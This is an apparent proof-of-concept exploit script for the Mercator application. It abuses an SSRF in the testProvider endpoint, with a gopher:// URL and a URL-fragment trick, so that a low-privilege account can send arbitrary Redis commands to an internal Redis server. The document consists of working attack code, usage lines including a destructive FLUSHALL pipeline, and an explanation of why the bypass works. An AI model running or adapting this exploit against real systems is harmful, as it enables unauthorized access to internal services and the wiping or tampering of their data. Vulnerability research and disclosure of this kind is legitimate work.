README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Mercator SSRF -> gopher:// -> Redis helper.
Sends ONE Redis command (or a small pipeline of them) to an internal Redis
instance through the SSRF in `ConfigurationController::testProvider`.
Why this works
--------------
1. The vulnerable controller calls `curl_init($provider . '/api/dbInfo')`.
We append `#` to our URL so curl drops the `/api/dbInfo` suffix as a
URL fragment.
2. libcurl in the deployed PHP container speaks `gopher://`. Gopher URLs
of the form `gopher://host:port/_<bytes>` send `<bytes>` raw on the
wire after dropping the single type character `_`.
3. We URL-encode RESP-encoded Redis commands as `<bytes>`. Redis happily
parses them and executes.
Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role, so a regular low-privilege account is sufficient.
Usage
-----
# Single command
./bin/python3 ssrf2redis.py \\
--base http://127.0.0.1:8000 \\
--user lowuser --password 'Lowuser123!' \\
--redis 127.0.0.1:6379 \\
--cmd SET ssrf_proof 'pwned-by-low-priv'
# Pipeline (commands separated by a literal ';' token)
./bin/python3 ssrf2redis.py ... --pipeline \\
FLUSHALL ';' \\
SET marker hello ';' \\
CONFIG GET dir
The script reports the flash message returned by Mercator (an oracle), not
the Redis reply — gopher is fire-and-forget here; verify the effect with a
follow-up command or out-of-band check.
"""
import argparse
import re
import sys
import urllib.parse
import warnings
# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")
import requests
import urllib3
urllib3.disable_warnings()
LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
FLASH_RE = re.compile(r'(Could not connect to provider[^<"\']*|Last NVD update:[^<"\']*)')
# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────
def log(message):
"""Status banner — emitted on stderr so stdout stays pure result data."""
print(message, file=sys.stderr)
def die(message):
log(f"[!] {message}")
sys.exit(1)
def login(session, base, user, password):
"""Authenticate, print the login section, and return the CSRF token."""
r = session.get(f"{base}/login", timeout=10)
m = LOGIN_TOKEN_RE.search(r.text)
if not m:
die("CSRF token not found on /login")
r = session.post(
f"{base}/login",
data={"_token": m.group(1), "login": user, "password": password},
timeout=10, allow_redirects=True,
)
if r.url.rstrip("/").endswith("/login"):
die(f"authentication failed for '{user}'")
m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
if not m:
die("CSRF token not found after login")
csrf = m.group(1)
log("[+] login")
log(f" user : {user}")
for c in session.cookies:
log(f" cookie : {c.name}={c.value}")
log(f" csrf token : {csrf}")
return csrf
# ── SSRF -> gopher -> Redis ─────────────────────────────────────────────────
def require_configure(session, base):
"""Confirm the account holds the `configure` permission."""
r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10)
if r.status_code == 403:
die("account lacks the 'configure' permission")
def resp_encode(command):
"""Encode a single Redis command (list of str/bytes) as a RESP array."""
parts = [f"*{len(command)}\r\n".encode()]
for a in command:
if isinstance(a, str):
a = a.encode()
parts.append(f"${len(a)}\r\n".encode() + a + b"\r\n")
return b"".join(parts)
def build_pipeline(items):
"""Split a flat list at the literal ';' separator -> list of commands."""
cmds, current = [], []
for tok in items:
if tok == ";":
if current:
cmds.append(current)
current = []
else:
current.append(tok)
if current:
cmds.append(current)
return cmds
def fire(session, base, csrf, gopher_url):
"""Send the gopher payload and return Mercator's flash message."""
session.post(
f"{base}/admin/config/parameters",
data={
"_token": csrf,
"_method": "PUT",
"active_tab": "cve",
"action": "test_provider",
"provider": gopher_url,
},
allow_redirects=False, timeout=20,
)
page = session.get(f"{base}/admin/config/parameters?tab=cve").text
m = FLASH_RE.search(page)
return m.group(1) if m else "(no flash captured)"
def main():
ap = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)
ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
ap.add_argument("--user", required=True, help="account login")
ap.add_argument("--password", required=True)
ap.add_argument("--redis", required=True, help="host:port of the target Redis")
ap.add_argument("--cmd", nargs="+", help="single Redis command, e.g. SET k v")
ap.add_argument("--pipeline", nargs="+",
help="multiple commands separated by a literal ';' token, "
"e.g. FLUSHALL ';' SET k v ';' SAVE")
args = ap.parse_args()
if args.cmd and args.pipeline:
die("use either --cmd or --pipeline, not both")
if not args.cmd and not args.pipeline:
die("provide --cmd or --pipeline")
commands = [args.cmd] if args.cmd else build_pipeline(args.pipeline)
raw = b"".join(resp_encode(c) for c in commands)
gopher_url = f"gopher://{args.redis}/_{urllib.parse.quote(raw, safe='')}#"
session = requests.Session()
session.verify = False
csrf = login(session, args.base, args.user, args.password)
require_configure(session, args.base)
log(f"[*] sending {len(commands)} Redis command(s) to {args.redis} via gopher SSRF")
for c in commands:
log(f" - {' '.join(c)}")
flash = fire(session, args.base, csrf, gopher_url)
log(f"[+] flash: {flash}")
log("[*] flash is Mercator's view of the gopher response, not Redis — "
"verify side effects out-of-band")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
die("interrupted")
except requests.RequestException as e:
die(f"could not reach Mercator: {e}")